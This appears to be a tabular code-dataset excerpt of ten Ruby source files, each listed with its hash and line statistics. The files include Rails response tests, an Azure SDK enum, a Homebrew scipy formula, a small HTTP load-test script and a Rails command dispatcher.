hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e956bd6eb1a50ad14c8e892d589abd7fd39e6e1b | 955 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "rspec"
# Smoke spec: confirms the generated BigQuery Reservation client loads and
# its service class can be instantiated without raising.
RSpec.describe "Google::Apis::BigqueryreservationV1" do
  it "should load" do
    # Requiring the generated file surfaces any syntax errors in it.
    expect { require "google/apis/bigqueryreservation_v1" }.not_to raise_error
    # Instantiating the service surfaces constant/load-order errors.
    expect { Google::Apis::BigqueryreservationV1::BigQueryReservationService.new }.not_to raise_error
  end
end
| 34.107143 | 74 | 0.757068 |
ab55ba580ebc78b17ab2f83a5c077101c0466fa5 | 374 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure
  module IotHub
    module Mgmt
      module V2018_01_22
        module Models
          #
          # Defines values for IotHubScaleType
          #
          module IotHubScaleType
            # Each constant's name doubles as its wire-format string value.
            %w[Automatic Manual None].each { |name| const_set(name, name) }
          end
        end
      end
    end
  end
end
| 22 | 70 | 0.684492 |
acdd41b559272aaabad4b8ac58f911195693f9f1 | 93 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'passenger_memory_status'
| 31 | 58 | 0.774194 |
d539a9525f6871d3f0a5df04cf4f92669e0f5b9d | 2,330 | # -*- coding:utf-8; mode:ruby; -*-
require 'rbindkeys'
require 'revdev'
include Rbindkeys
# Specs for the rbindkeys command-line interface: option parsing and
# dispatch of CLI::main. (Fixes spec-description typos: "shoud" -> "should",
# "pring" -> "print", stray trailing space.)
describe CLI do
  describe '#.main' do
    context ', when ARGV is empty,' do
      before do
        @args = []
      end
      # No event device given: usage is printed and the process exits non-zero.
      it 'should exit with code 1' do
        expect { CLI::main @args }.to raise_error do |e|
          expect(e).to be_a SystemExit
          expect(e.status).to eq 1
        end
      end
    end
    context ', when ARGV have an argument,' do
      before do
        @args = ['foo']
        @observer = double Observer
        expect(Observer).to receive(:new) { @observer }
        expect(@observer).to receive(:start) { nil }
      end
      it 'should call Observer#new#start' do
        # The default config must be left unchanged when --config is absent.
        config = CLI::config
        CLI::main @args
        expect(CLI::config).to eq config
      end
    end
    context ', when ARGV have an invalid option (--config),' do
      before do
        @args = ['--config']
      end
      # --config requires an argument, so a bare flag is rejected.
      it 'should exit with code 1' do
        expect { CLI::main @args }.to raise_error do |e|
          expect(e).to be_a SystemExit
          expect(e.status).to eq 1
        end
      end
    end
    context ', when ARGV have an option (--config) and an event device,' do
      before do
        @config = 'a_config_file'
        @args = ['--config', @config, 'foodev']
        @observer = double Observer
        expect(Observer).to receive(:new) { @observer }
        expect(@observer).to receive(:start) { nil }
      end
      it 'should call Observer#new#start' do
        CLI::main @args
        expect(CLI::config).to eq @config
      end
    end
    context ', when ARGV have an option (--evdev-list),' do
      before do
        @args = ['--evdev-list']
        @evdev = double Revdev::EventDevice
        @id = double Object
        allow(@evdev).to receive(:device_name) { "foo" }
        allow(@evdev).to receive(:device_id) { @id }
        allow(@id).to receive(:hr_bustype) { 'bar' }
        allow(Revdev::EventDevice).to receive(:new) { @evdev }
        expect(Dir).to receive(:glob).with(CLI::EVDEVS)
          .and_return(['/dev/input/event4',
                       '/dev/input/event2',
                       '/dev/input/event13'])
      end
      it 'should print device info' do
        CLI::main @args
      end
    end
  end
end
| 29.871795 | 75 | 0.540343 |
ffd1bdbfbbe6d6c799580d73736678395a2cc090 | 819 | require 'opbeat/filter'
module Opbeat
  module DataBuilders
    # Serialises an error message into the hash payload sent to the Opbeat API.
    class Error < DataBuilder
      # Scalar attributes copied straight onto the payload, in wire order.
      SCALAR_FIELDS = %i[message timestamp level logger culprit machine
                         extra param_message].freeze
      # Nested attributes serialised via #to_h only when present.
      NESTED_FIELDS = %i[exception stacktrace http user].freeze

      # Returns the payload hash for +error_message+.
      def build(error_message)
        payload = SCALAR_FIELDS.each_with_object({}) do |field, hash|
          hash[field] = error_message.public_send(field)
        end
        NESTED_FIELDS.each_with_object(payload) do |field, hash|
          value = error_message.public_send(field)
          hash[field] = value.to_h if value
        end
      end
    end
  end
end
| 29.25 | 82 | 0.659341 |
ac3b77a42c8e3e092845d77814ebc8d481e19a69 | 143 | class AddJourneysCountToCategories < ActiveRecord::Migration[6.1]
def change
add_column :categories, :journeys_count, :integer
end
end
| 23.833333 | 65 | 0.783217 |
ed64d899029b0182740fa221c4cabc0d2dcd381a | 19,557 | # frozen_string_literal: true
require "abstract_unit"
require "timeout"
require "rack/content_length"
# Unit tests for ActionDispatch::Response: commit/streaming behaviour,
# status/header handling, cookies, ETags, charsets, default headers and
# Rack compatibility.
class ResponseTest < ActiveSupport::TestCase
  def setup
    @response = ActionDispatch::Response.create
    @response.request = ActionDispatch::Request.empty
  end
  # A thread blocked in #await_commit must wake once #commit! is called.
  def test_can_wait_until_commit
    t = Thread.new {
      @response.await_commit
    }
    @response.commit!
    assert_predicate @response, :committed?
    assert t.join(0.5)
  end
  def test_stream_close
    @response.stream.close
    assert_predicate @response.stream, :closed?
  end
  def test_stream_write
    @response.stream.write "foo"
    @response.stream.close
    assert_equal "foo", @response.body
  end
  # Writing to a closed stream raises rather than silently dropping data.
  def test_write_after_close
    @response.stream.close
    e = assert_raises(IOError) do
      @response.stream.write "omg"
    end
    assert_equal "closed stream", e.message
  end
  # Once the body has been read back as a string, the original enumerable
  # body must not be iterated again when the Rack triplet is built.
  def test_each_isnt_called_if_str_body_is_written
    # Controller writes and reads response body
    each_counter = 0
    @response.body = Object.new.tap { |o| o.singleton_class.define_method(:each) { |&block| each_counter += 1; block.call "foo" } }
    @response["X-Foo"] = @response.body
    assert_equal 1, each_counter, "#each was not called once"
    # Build response
    status, headers, body = @response.to_a
    assert_equal 200, status
    assert_equal "foo", headers["X-Foo"]
    assert_equal "foo", body.each.to_a.join
    # Show that #each was not called twice
    assert_equal 1, each_counter, "#each was not called once"
  end
  def test_set_header_after_read_body_during_action
    @response.body
    # set header after the action reads back @response.body
    @response["x-header"] = "Best of all possible worlds."
    # the response can be built.
    status, headers, body = @response.to_a
    assert_equal 200, status
    assert_equal "", body.body
    assert_equal "Best of all possible worlds.", headers["x-header"]
  end
  def test_read_body_during_action
    @response.body = "Hello, World!"
    # even though there's no explicitly set content-type,
    assert_nil @response.content_type
    # after the action reads back @response.body,
    assert_equal "Hello, World!", @response.body
    # the response can be built.
    status, headers, body = @response.to_a
    assert_equal 200, status
    assert_equal({
      "Content-Type" => "text/html; charset=utf-8"
    }, headers)
    parts = []
    body.each { |part| parts << part }
    assert_equal ["Hello, World!"], parts
  end
  def test_response_body_encoding
    body = ["hello".encode(Encoding::UTF_8)]
    response = ActionDispatch::Response.new 200, {}, body
    response.request = ActionDispatch::Request.empty
    assert_equal Encoding::UTF_8, response.body.encoding
  end
  # Clearing the charset falls back to the default (utf-8).
  def test_response_charset_writer
    @response.charset = "utf-16"
    assert_equal "utf-16", @response.charset
    @response.charset = nil
    assert_equal "utf-8", @response.charset
  end
  def test_setting_content_type_header_impacts_content_type_method
    @response.headers["Content-Type"] = "application/aaron"
    assert_equal "application/aaron", @response.content_type
  end
  def test_empty_content_type_returns_nil
    @response.headers["Content-Type"] = ""
    assert_nil @response.content_type
  end
  test "simple output" do
    @response.body = "Hello, World!"
    status, headers, body = @response.to_a
    assert_equal 200, status
    assert_equal({
      "Content-Type" => "text/html; charset=utf-8"
    }, headers)
    parts = []
    body.each { |part| parts << part }
    assert_equal ["Hello, World!"], parts
  end
  # A "200 OK" status-line string is parsed down to the integer code.
  test "status handled properly in initialize" do
    assert_equal 200, ActionDispatch::Response.new("200 OK").status
  end
  def test_only_set_charset_still_defaults_to_text_html
    response = ActionDispatch::Response.new
    response.charset = "utf-16"
    _, headers, _ = response.to_a
    assert_equal "text/html; charset=utf-16", headers["Content-Type"]
  end
  test "utf8 output" do
    @response.body = [1090, 1077, 1089, 1090].pack("U*")
    status, headers, _ = @response.to_a
    assert_equal 200, status
    assert_equal({
      "Content-Type" => "text/html; charset=utf-8"
    }, headers)
  end
  # 1xx and 204 responses must not advertise a Content-Length even if one
  # was set explicitly.
  test "content length" do
    [100, 101, 102, 204].each do |c|
      @response = ActionDispatch::Response.new
      @response.status = c.to_s
      @response.set_header "Content-Length", "0"
      _, headers, _ = @response.to_a
      assert_not headers.has_key?("Content-Length"), "#{c} must not have a Content-Length header field"
    end
  end
  # Per RFC 7230, these statuses carry no message body; any assigned body
  # is dropped from the Rack triplet.
  test "does not contain a message-body" do
    [100, 101, 102, 204, 304].each do |c|
      @response = ActionDispatch::Response.new
      @response.status = c.to_s
      @response.body = "Body must not be included"
      _, _, body = @response.to_a
      assert_empty body, "#{c} must not have a message-body but actually contains #{body}"
    end
  end
  test "content type" do
    [204, 304].each do |c|
      @response = ActionDispatch::Response.new
      @response.status = c.to_s
      _, headers, _ = @response.to_a
      assert_not headers.has_key?("Content-Type"), "#{c} should not have Content-Type header"
    end
    [200, 302, 404, 500].each do |c|
      @response = ActionDispatch::Response.new
      @response.status = c.to_s
      _, headers, _ = @response.to_a
      assert headers.has_key?("Content-Type"), "#{c} did not have Content-Type header"
    end
  end
  test "does not include Status header" do
    @response.status = "200 OK"
    _, headers, _ = @response.to_a
    assert_not headers.has_key?("Status")
  end
  # #response_code always yields the integer regardless of assignment form.
  test "response code" do
    @response.status = "200 OK"
    assert_equal 200, @response.response_code
    @response.status = "200"
    assert_equal 200, @response.response_code
    @response.status = 200
    assert_equal 200, @response.response_code
  end
  test "code" do
    @response.status = "200 OK"
    assert_equal "200", @response.code
    @response.status = "200"
    assert_equal "200", @response.code
    @response.status = 200
    assert_equal "200", @response.code
  end
  test "message" do
    @response.status = "200 OK"
    assert_equal "OK", @response.message
    @response.status = "200"
    assert_equal "OK", @response.message
    @response.status = 200
    assert_equal "OK", @response.message
  end
  test "cookies" do
    @response.set_cookie("user_name", value: "david", path: "/")
    _status, headers, _body = @response.to_a
    assert_equal "user_name=david; path=/", headers["Set-Cookie"]
    assert_equal({ "user_name" => "david" }, @response.cookies)
  end
  # Multiple cookies are newline-joined in a single Set-Cookie value.
  test "multiple cookies" do
    @response.set_cookie("user_name", value: "david", path: "/")
    @response.set_cookie("login", value: "foo&bar", path: "/", expires: Time.utc(2005, 10, 10, 5))
    _status, headers, _body = @response.to_a
    assert_equal "user_name=david; path=/\nlogin=foo%26bar; path=/; expires=Mon, 10 Oct 2005 05:00:00 -0000", headers["Set-Cookie"]
    assert_equal({ "login" => "foo&bar", "user_name" => "david" }, @response.cookies)
  end
  test "delete cookies" do
    @response.set_cookie("user_name", value: "david", path: "/")
    @response.set_cookie("login", value: "foo&bar", path: "/", expires: Time.utc(2005, 10, 10, 5))
    @response.delete_cookie("login")
    assert_equal({ "user_name" => "david", "login" => nil }, @response.cookies)
  end
  # #etag= produces a *weak* validator (W/ prefix) derived from an MD5 of
  # the assigned value.
  test "read ETag and Cache-Control" do
    resp = ActionDispatch::Response.new.tap { |response|
      response.cache_control[:public] = true
      response.etag = "123"
      response.body = "Hello"
    }
    resp.to_a
    assert_predicate resp, :etag?
    assert_predicate resp, :weak_etag?
    assert_not_predicate resp, :strong_etag?
    assert_equal('W/"202cb962ac59075b964b07152d234b70"', resp.etag)
    assert_equal({ public: true }, resp.cache_control)
    assert_equal("public", resp.headers["Cache-Control"])
    assert_equal('W/"202cb962ac59075b964b07152d234b70"', resp.headers["ETag"])
  end
  test "read strong ETag" do
    resp = ActionDispatch::Response.new.tap { |response|
      response.cache_control[:public] = true
      response.strong_etag = "123"
      response.body = "Hello"
    }
    resp.to_a
    assert_predicate resp, :etag?
    assert_not_predicate resp, :weak_etag?
    assert_predicate resp, :strong_etag?
    assert_equal('"202cb962ac59075b964b07152d234b70"', resp.etag)
  end
  test "read charset and content type" do
    resp = ActionDispatch::Response.new.tap { |response|
      response.charset = "utf-16"
      response.content_type = Mime[:xml]
      response.body = "Hello"
    }
    resp.to_a
    assert_equal("utf-16", resp.charset)
    assert_equal(Mime[:xml], resp.media_type)
    assert_equal("application/xml; charset=utf-16", resp.content_type)
    assert_equal("application/xml; charset=utf-16", resp.headers["Content-Type"])
  end
  test "read content type with default charset utf-8" do
    resp = ActionDispatch::Response.new(200, "Content-Type" => "text/xml")
    assert_equal("utf-8", resp.charset)
  end
  # Mutates the class-level default; restored in ensure so other tests are
  # not affected.
  test "read content type with charset utf-16" do
    original = ActionDispatch::Response.default_charset
    begin
      ActionDispatch::Response.default_charset = "utf-16"
      resp = ActionDispatch::Response.new(200, "Content-Type" => "text/xml")
      assert_equal("utf-16", resp.charset)
    ensure
      ActionDispatch::Response.default_charset = original
    end
  end
  # Class-level default_headers flow through to every created response.
  test "read x_frame_options, x_content_type_options, x_xss_protection, x_download_options and x_permitted_cross_domain_policies, referrer_policy" do
    original_default_headers = ActionDispatch::Response.default_headers
    begin
      ActionDispatch::Response.default_headers = {
        "X-Frame-Options" => "DENY",
        "X-Content-Type-Options" => "nosniff",
        "X-XSS-Protection" => "1;",
        "X-Download-Options" => "noopen",
        "X-Permitted-Cross-Domain-Policies" => "none",
        "Referrer-Policy" => "strict-origin-when-cross-origin"
      }
      resp = ActionDispatch::Response.create.tap { |response|
        response.body = "Hello"
      }
      resp.to_a
      assert_equal("DENY", resp.headers["X-Frame-Options"])
      assert_equal("nosniff", resp.headers["X-Content-Type-Options"])
      assert_equal("1;", resp.headers["X-XSS-Protection"])
      assert_equal("noopen", resp.headers["X-Download-Options"])
      assert_equal("none", resp.headers["X-Permitted-Cross-Domain-Policies"])
      assert_equal("strict-origin-when-cross-origin", resp.headers["Referrer-Policy"])
    ensure
      ActionDispatch::Response.default_headers = original_default_headers
    end
  end
  test "read custom default_header" do
    original_default_headers = ActionDispatch::Response.default_headers
    begin
      ActionDispatch::Response.default_headers = {
        "X-XX-XXXX" => "Here is my phone number"
      }
      resp = ActionDispatch::Response.create.tap { |response|
        response.body = "Hello"
      }
      resp.to_a
      assert_equal("Here is my phone number", resp.headers["X-XX-XXXX"])
    ensure
      ActionDispatch::Response.default_headers = original_default_headers
    end
  end
  # method_missing is private, so respond_to? only sees it with the
  # include_private flag.
  test "respond_to? accepts include_private" do
    assert_not_respond_to @response, :method_missing
    assert @response.respond_to?(:method_missing, true)
  end
  test "can be explicitly destructured into status, headers and an enumerable body" do
    response = ActionDispatch::Response.new(404, { "Content-Type" => "text/plain" }, ["Not Found"])
    response.request = ActionDispatch::Request.empty
    status, headers, body = *response
    assert_equal 404, status
    assert_equal({ "Content-Type" => "text/plain" }, headers)
    assert_equal ["Not Found"], body.each.to_a
  end
  test "[response.to_a].flatten does not recurse infinitely" do
    Timeout.timeout(1) do # use a timeout to prevent it stalling indefinitely
      status, headers, body = [@response.to_a].flatten
      assert_equal @response.status, status
      assert_equal @response.headers, headers
      assert_equal @response.body, body.each.to_a.join
    end
  end
  # The raw triplet carries no Content-Length; middleware adds it.
  test "compatibility with Rack::ContentLength" do
    @response.body = "Hello"
    app = lambda { |env| @response.to_a }
    env = Rack::MockRequest.env_for("/")
    _status, headers, _body = app.call(env)
    assert_nil headers["Content-Length"]
    _status, headers, _body = Rack::ContentLength.new(app).call(env)
    assert_equal "5", headers["Content-Length"]
  end
end
# Exercises the Rack-style header accessors on ActionDispatch::Response:
# has_header?/get_header/set_header/delete_header/add_header.
class ResponseHeadersTest < ActiveSupport::TestCase
  def setup
    @response = ActionDispatch::Response.create
    @response.set_header "Foo", "1"
  end
  # Lookup is case-sensitive at this API level and tolerates nil keys.
  test "has_header?" do
    assert @response.has_header? "Foo"
    assert_not @response.has_header? "foo"
    assert_not @response.has_header? nil
  end
  test "get_header" do
    assert_equal "1", @response.get_header("Foo")
    assert_nil @response.get_header("foo")
    assert_nil @response.get_header(nil)
  end
  # Setting a header to nil keeps the key present but clears its value.
  test "set_header" do
    assert_equal "2", @response.set_header("Foo", "2")
    assert @response.has_header?("Foo")
    assert_equal "2", @response.get_header("Foo")
    assert_nil @response.set_header("Foo", nil)
    assert @response.has_header?("Foo")
    assert_nil @response.get_header("Foo")
  end
  # delete_header returns the removed value, or nil for absent keys.
  test "delete_header" do
    assert_nil @response.delete_header(nil)
    assert_nil @response.delete_header("foo")
    assert @response.has_header?("Foo")
    assert_equal "1", @response.delete_header("Foo")
    assert_not @response.has_header?("Foo")
  end
  # add_header comma-joins onto existing values and ignores nil additions.
  test "add_header" do
    # Add a value to an existing header
    assert_equal "1,2", @response.add_header("Foo", "2")
    assert_equal "1,2", @response.get_header("Foo")
    # Add nil to an existing header
    assert_equal "1,2", @response.add_header("Foo", nil)
    assert_equal "1,2", @response.get_header("Foo")
    # Add nil to a nonexistent header
    assert_nil @response.add_header("Bar", nil)
    assert_not @response.has_header?("Bar")
    assert_nil @response.get_header("Bar")
    # Add a value to a nonexistent header
    assert_equal "1", @response.add_header("Bar", "1")
    assert @response.has_header?("Bar")
    assert_equal "1", @response.get_header("Bar")
  end
end
# Integration tests comparing how the test-client @response parses output
# from a "railsish" app (real ActionDispatch::Response) versus a bare
# "rackish" app (raw status/headers/body triplet).
class ResponseIntegrationTest < ActionDispatch::IntegrationTest
  test "response cache control from railsish app" do
    @app = lambda { |env|
      ActionDispatch::Response.new.tap { |resp|
        resp.cache_control[:public] = true
        resp.etag = "123"
        resp.body = "Hello"
        resp.request = ActionDispatch::Request.empty
      }.to_a
    }
    get "/"
    assert_response :success
    assert_equal("public", @response.headers["Cache-Control"])
    assert_equal('W/"202cb962ac59075b964b07152d234b70"', @response.headers["ETag"])
    assert_equal('W/"202cb962ac59075b964b07152d234b70"', @response.etag)
    assert_equal({ public: true }, @response.cache_control)
  end
  # Raw Rack headers must round-trip into the same reader API.
  test "response cache control from rackish app" do
    @app = lambda { |env|
      [200,
       { "ETag" => 'W/"202cb962ac59075b964b07152d234b70"',
         "Cache-Control" => "public" }, ["Hello"]]
    }
    get "/"
    assert_response :success
    assert_equal("public", @response.headers["Cache-Control"])
    assert_equal('W/"202cb962ac59075b964b07152d234b70"', @response.headers["ETag"])
    assert_equal('W/"202cb962ac59075b964b07152d234b70"', @response.etag)
    assert_equal({ public: true }, @response.cache_control)
  end
  test "response charset and content type from railsish app" do
    @app = lambda { |env|
      ActionDispatch::Response.new.tap { |resp|
        resp.charset = "utf-16"
        resp.content_type = Mime[:xml]
        resp.body = "Hello"
        resp.request = ActionDispatch::Request.empty
      }.to_a
    }
    get "/"
    assert_response :success
    assert_equal("utf-16", @response.charset)
    assert_equal(Mime[:xml], @response.media_type)
    assert_equal("application/xml; charset=utf-16", @response.content_type)
    assert_equal("application/xml; charset=utf-16", @response.headers["Content-Type"])
  end
  test "response charset and content type from rackish app" do
    @app = lambda { |env|
      [200,
       { "Content-Type" => "application/xml; charset=utf-16" },
       ["Hello"]]
    }
    get "/"
    assert_response :success
    assert_equal("utf-16", @response.charset)
    assert_equal(Mime[:xml], @response.media_type)
    assert_equal("application/xml; charset=utf-16", @response.content_type)
    assert_equal("application/xml; charset=utf-16", @response.headers["Content-Type"])
  end
  # strong_etag= emits the validator without the W/ weak prefix.
  test "strong ETag validator" do
    @app = lambda { |env|
      ActionDispatch::Response.new.tap { |resp|
        resp.strong_etag = "123"
        resp.body = "Hello"
        resp.request = ActionDispatch::Request.empty
      }.to_a
    }
    get "/"
    assert_response :ok
    assert_equal('"202cb962ac59075b964b07152d234b70"', @response.headers["ETag"])
    assert_equal('"202cb962ac59075b964b07152d234b70"', @response.etag)
  end
  # Extra media-type parameters (e.g. header=present) are preserved
  # verbatim in content_type while media_type/charset are still parsed out.
  test "response Content-Type with optional parameters" do
    @app = lambda { |env|
      [
        200,
        { "Content-Type" => "text/csv; charset=utf-16; header=present" },
        ["Hello"]
      ]
    }
    get "/"
    assert_response :success
    assert_equal("text/csv; charset=utf-16; header=present", @response.headers["Content-Type"])
    assert_equal("text/csv; charset=utf-16; header=present", @response.content_type)
    assert_equal("text/csv", @response.media_type)
    assert_equal("utf-16", @response.charset)
  end
  # Parameter order must not matter for charset extraction.
  test "response Content-Type with optional parameters that set before charset" do
    @app = lambda { |env|
      [
        200,
        { "Content-Type" => "text/csv; header=present; charset=utf-16" },
        ["Hello"]
      ]
    }
    get "/"
    assert_response :success
    assert_equal("text/csv; header=present; charset=utf-16", @response.headers["Content-Type"])
    assert_equal("text/csv; header=present; charset=utf-16", @response.content_type)
    assert_equal("text/csv", @response.media_type)
    assert_equal("utf-16", @response.charset)
  end
  # A quoted-string charset value must be unquoted when read back.
  test "response Content-Type with quoted-string" do
    @app = lambda { |env|
      [
        200,
        { "Content-Type" => 'text/csv; header=present; charset="utf-16"' },
        ["Hello"]
      ]
    }
    get "/"
    assert_response :success
    assert_equal('text/csv; header=present; charset="utf-16"', @response.headers["Content-Type"])
    assert_equal('text/csv; header=present; charset="utf-16"', @response.content_type)
    assert_equal("text/csv", @response.media_type)
    assert_equal("utf-16", @response.charset)
  end
  # Legacy behaviour flag: content_type returns only the media type (and
  # non-charset params) and warns via assert_deprecated; restored in ensure.
  test "`content type` returns header that excludes `charset` when specified `return_only_media_type_on_content_type`" do
    original = ActionDispatch::Response.return_only_media_type_on_content_type
    ActionDispatch::Response.return_only_media_type_on_content_type = true
    @app = lambda { |env|
      if env["PATH_INFO"] == "/with_parameters"
        [200, { "Content-Type" => "text/csv; header=present; charset=utf-16" }, [""]]
      else
        [200, { "Content-Type" => "text/csv; charset=utf-16" }, [""]]
      end
    }
    get "/"
    assert_response :success
    assert_deprecated do
      assert_equal("text/csv", @response.content_type)
    end
    get "/with_parameters"
    assert_response :success
    assert_deprecated do
      assert_equal("text/csv; header=present", @response.content_type)
    end
  ensure
    ActionDispatch::Response.return_only_media_type_on_content_type = original
  end
end
| 31.241214 | 149 | 0.674234 |
03ebb22c15072e5bd550d60c23f993ad52ebacde | 1,001 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended to check this file into your version control system.
ActiveRecord::Schema.define(:version => 20110424190739) do
  # Users table for hand-rolled authentication: separate hash and salt
  # columns rather than a single password digest.
  create_table "users", :force => true do |t|
    %w[username email password_hash password_salt].each do |column|
      t.string column
    end
    t.datetime "created_at"
    t.datetime "updated_at"
  end
end
| 40.04 | 86 | 0.754246 |
ab3cb45dcd1e7dd875a3d5382ad24520fa55b5fa | 1,027 | require_relative '../../pipe/http'
# Load-test driver: fans messages out over a pool of concurrent HTTP pipes
# at a configurable aggregate rate.
#
# Environment:
#   COUNT            total messages to send (0 or unset = run forever)
#   PER_SECOND       target messages per second across the run (default 1)
#   PIPELINR_API_KEY credentials passed to each HTTPPipe
numpipes = 500
count = ENV['COUNT'].nil? ? 0 : ENV['COUNT'].to_i
persec = ENV['PER_SECOND'].nil? ? 1 : ENV['PER_SECOND'].to_f
puts "#{persec}: #{count}"
buffer = Queue.new     # messages waiting to be sent
donebuffer = Queue.new # send results (currently never drained)
threads = []
# Worker pool: each thread owns one HTTPPipe and ships queued messages
# forever. NOTE(review): HTTPPipe#send shadows Object#send — it works, but a
# less surprising name (e.g. #deliver) would be preferable.
numpipes.times do
  threads << Thread.new do
    pipe = HTTPPipe.new(apikey: ENV['PIPELINR_API_KEY'], pipe: 'testpipe-ruby')
    loop do
      donebuffer << pipe.send(buffer.deq)
    end
  end
end
# Enqueue messages at the requested rate. The workers loop forever, so the
# final join (below) blocks indefinitely once the target count is reached —
# kill the process to stop an open-ended run.
timestep = 1.0 / persec
i = 0
while count == 0 || i < count
  i += 1
  buffer << { route: ['route'], payload: %Q{{"index":#{i}}} }
  sleep timestep
end
threads.each{|t| t.join} | 16.836066 | 79 | 0.584226 |
338e97200b0333e4a7d0f7b0916ac98a8552cf54 | 235 | module Rubicus; end
$:.unshift(File.dirname(__FILE__)) unless
$:.include?(File.dirname(__FILE__)) || $:.include?(File.expand_path(File.dirname(__FILE__)))
require 'rubicus/version'
require 'rubicus/graph'
require 'rubicus/layers' | 29.375 | 94 | 0.744681 |
282e794c78cc656d3b910709363271a36286bc37 | 235 | require File.dirname(__FILE__) + '/../../spec_helper'
require File.dirname(__FILE__) + '/fixtures/classes'
require File.dirname(__FILE__) + '/shared/replace'
describe "Array#replace" do
it_behaves_like(:array_replace, :replace)
end
| 29.375 | 53 | 0.753191 |
1dd830c4e5d980e674e8e4eb0b796734cca0a9d2 | 2,845 | class Scipy < Formula
desc "Software for mathematics, science, and engineering"
homepage "https://www.scipy.org"
url "https://files.pythonhosted.org/packages/b4/a2/4faa34bf0cdbefd5c706625f1234987795f368eb4e97bde9d6f46860843e/scipy-1.8.0.tar.gz"
sha256 "31d4f2d6b724bc9a98e527b5849b8a7e589bf1ea630c33aa563eda912c9ff0bd"
license "BSD-3-Clause"
head "https://github.com/scipy/scipy.git", branch: "master"
bottle do
sha256 cellar: :any, arm64_monterey: "2818d2eecf3d9126d53cc3629b5e06227a0ea7ea5a4a845d3dc1b81d0180b0d7"
sha256 cellar: :any, arm64_big_sur: "89d3d3b52108ace1c4a19671ec7b7e1bff59ae4472370b767411624f374e357d"
sha256 cellar: :any, monterey: "caf9212be80e0ff32f309c3dbad8861b307a8bdc0e980599eed2f408bf531c28"
sha256 cellar: :any, big_sur: "ae3e8196537deaf9739880873b9fe859c84229929f111a834a0ab951166d440d"
sha256 cellar: :any, catalina: "5e74dcfd26730a916093f9b18dee1b1bd1a6d58d52790839c4efe2f35c452ea1"
sha256 x86_64_linux: "b953884a721170689cec7207e3e416606a030a1e61542a83502dd643b086cc45"
end
depends_on "cython" => :build
depends_on "pythran" => :build
depends_on "swig" => :build
depends_on "gcc" # for gfortran
depends_on "numpy"
depends_on "openblas"
depends_on "pybind11"
depends_on "[email protected]"
cxxstdlib_check :skip
fails_with gcc: "5"
def install
openblas = Formula["openblas"].opt_prefix
ENV["ATLAS"] = "None" # avoid linking against Accelerate.framework
ENV["BLAS"] = ENV["LAPACK"] = "#{openblas}/lib/#{shared_library("libopenblas")}"
config = <<~EOS
[DEFAULT]
library_dirs = #{HOMEBREW_PREFIX}/lib
include_dirs = #{HOMEBREW_PREFIX}/include
[openblas]
libraries = openblas
library_dirs = #{openblas}/lib
include_dirs = #{openblas}/include
EOS
Pathname("site.cfg").write config
site_packages = Language::Python.site_packages("python3")
ENV.prepend_create_path "PYTHONPATH", Formula["cython"].opt_libexec/site_packages
ENV.prepend_create_path "PYTHONPATH", Formula["pythran"].opt_libexec/site_packages
ENV.prepend_create_path "PYTHONPATH", Formula["numpy"].opt_prefix/site_packages
ENV.prepend_create_path "PYTHONPATH", site_packages
system Formula["[email protected]"].opt_bin/"python3", "setup.py", "build",
"--fcompiler=gfortran", "--parallel=#{ENV.make_jobs}"
system Formula["[email protected]"].opt_bin/"python3", *Language::Python.setup_install_args(prefix)
end
# cleanup leftover .pyc files from previous installs which can cause problems
# see https://github.com/Homebrew/homebrew-python/issues/185#issuecomment-67534979
def post_install
rm_f Dir["#{HOMEBREW_PREFIX}/lib/python*.*/site-packages/scipy/**/*.pyc"]
end
test do
system Formula["[email protected]"].opt_bin/"python3", "-c", "import scipy"
end
end
| 41.231884 | 133 | 0.739543 |
f7753cbb8362869df5201ea2bd642e3583d49dbd | 1,620 | require 'rails/commands/commands_tasks'
module Rails
  # Minimal command framework: subclasses register themselves via .inherited,
  # and any public instance method becomes a runnable command. Tasks not
  # matched by a registered subclass fall through to the legacy
  # Rails::CommandsTasks dispatcher.
  class Command #:nodoc:
    attr_reader :argv
    def initialize(argv = [])
      @argv = argv
      @option_parser = build_option_parser
      @options = {}
    end
    # Entry point: map +task_name+ (e.g. "db:migrate") to a command method
    # name and dispatch to the first subclass implementing it.
    def self.run(task_name, argv)
      command_name = command_name_for(task_name)
      if command = command_for(command_name)
        command.new(argv).run(command_name)
      else
        Rails::CommandsTasks.new(argv).run_command!(task_name)
      end
    end
    # Parses options registered for +command_name+, then invokes the
    # like-named public method on this instance.
    def run(command_name)
      parse_options_for(command_name)
      @option_parser.parse! @argv
      public_send(command_name)
    end
    # Registers an OptionParser configuration block for +command_name+.
    def self.options_for(command_name, &options_to_parse)
      @@command_options[command_name] = options_to_parse
    end
    def self.set_banner(command_name, banner)
      options_for(command_name) { |opts, _| opts.banner = banner }
    end
    private
      # NOTE(review): class variables are shared across the whole subclass
      # tree — intentional here, since this class acts as the registry.
      @@commands = []
      @@command_options = {}
      def parse_options_for(command_name)
        @@command_options.fetch(command_name, proc {}).call(@option_parser, @options)
      end
      # Base parser: every command gets -h/--help for free.
      def build_option_parser
        OptionParser.new do |opts|
          opts.on('-h', '--help', 'Show this help.') do
            puts opts
            exit
          end
        end
      end
      # Auto-registers every subclass as a command provider.
      def self.inherited(command)
        @@commands << command
      end
      # "db:migrate" -> :db_migrate
      def self.command_name_for(task_name)
        task_name.gsub(':', '_').to_sym
      end
      def self.command_for(command_name)
        @@commands.find do |command|
          command.public_instance_methods.include?(command_name)
        end
      end
  end
end
| 22.816901 | 85 | 0.624074 |
